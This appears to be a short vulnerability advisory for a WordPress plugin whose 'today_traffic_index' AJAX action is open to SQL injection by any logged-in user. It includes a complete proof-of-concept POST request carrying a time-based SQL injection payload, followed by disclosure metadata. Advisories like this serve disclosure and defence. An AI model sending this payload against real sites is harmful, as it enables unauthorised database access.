The plugin does not validate and escape user input passed to the today_traffic_index AJAX action (available to any authenticated users) before using it in a SQL statement, leading to an SQL injection issue
POST /wp-admin/admin-ajax.php HTTP/1.1 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: en-GB,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 129 Connection: close Cookie: [subscriber+] action=today_traffic_index&start=0&length=1+procedure+analyse(updatexml(rand(),concat(0x3a,benchmark(30000000,sha1(1))),0x20),1);
JrXnm
JrXnm
Yes
2021-10-06 (about 10 months ago)
2021-10-06 (about 10 months ago)
2022-04-12 (about 4 months ago)